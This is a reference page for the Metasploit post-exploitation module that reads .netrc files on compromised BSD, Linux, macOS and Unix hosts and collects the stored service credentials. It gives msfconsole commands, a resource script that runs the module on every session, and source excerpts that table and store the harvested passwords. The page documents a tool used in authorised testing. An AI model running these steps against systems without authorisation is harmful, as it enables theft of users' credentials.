UNIX Gather .netrc Credentials - Metasploit


This page contains detailed information about how to use the post/multi/gather/netrc_creds metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: UNIX Gather .netrc Credentials
Module: post/multi/gather/netrc_creds
Source code: modules/post/multi/gather/netrc_creds.rb
Disclosure date: -
Last modification time: 2017-07-24 06:26:21 +0000
Supported architecture(s): -
Supported platform(s): BSD, Linux, OSX, Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: -

Post Module to obtain credentials saved for FTP and other services in .netrc

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/multi/gather/netrc_creds

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/multi/gather/netrc_creds
msf post(netrc_creds) > show options
    ... show and set options ...
msf post(netrc_creds) > set SESSION session-id
msf post(netrc_creds) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/multi/gather/netrc_creds")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage


Here is how the multi/gather/netrc_creds post exploitation module looks in the msfconsole:

msf6 > use post/multi/gather/netrc_creds

msf6 post(multi/gather/netrc_creds) > show info

       Name: UNIX Gather .netrc Credentials
     Module: post/multi/gather/netrc_creds
   Platform: BSD, Linux, OSX, Unix
       Arch: 
       Rank: Normal

Provided by:
  Jon Hart <[email protected]>

Compatible session types:
  Shell

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  Post Module to obtain credentials saved for FTP and other services 
  in .netrc

Module Options


This is a complete list of options available in the multi/gather/netrc_creds post exploitation module:

msf6 post(multi/gather/netrc_creds) > show options

Module options (post/multi/gather/netrc_creds):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the multi/gather/netrc_creds post exploitation module:

msf6 post(multi/gather/netrc_creds) > show advanced

Module advanced options (post/multi/gather/netrc_creds):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the multi/gather/netrc_creds module can do:

msf6 post(multi/gather/netrc_creds) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the multi/gather/netrc_creds post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(multi/gather/netrc_creds) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Couldn't read <NETRC_FILE>: <E.TO_S>


Here is a relevant code snippet related to the "Couldn't read <NETRC_FILE>: <E.TO_S>" error message:

67:	
68:	        # save whatever remains of this last cred if it is worth saving
69:	        creds << cred if (cred[:host] and cred[:user] and cred[:pass])
70:	
71:	      rescue ::Exception => e
72:	        print_error("Couldn't read #{netrc_file}: #{e.to_s}")
73:	      end
74:	    end
75:	
76:	    # print out everything we've found
77:	    creds.each do |cred|

No creds collected


Here is a relevant code snippet related to the "No creds collected" error message:

77:	    creds.each do |cred|
78:	      cred_table << [ cred[:user], cred[:pass], cred[:host] ]
79:	    end
80:	
81:	    if cred_table.rows.empty?
82:	      print_status("No creds collected")
83:	    else
84:	      print_line("\n" + cred_table.to_s)
85:	
86:	      # store all found credentials
87:	      p = store_loot(

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


  • Jon Hart <jhart[at]spoofed.org>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.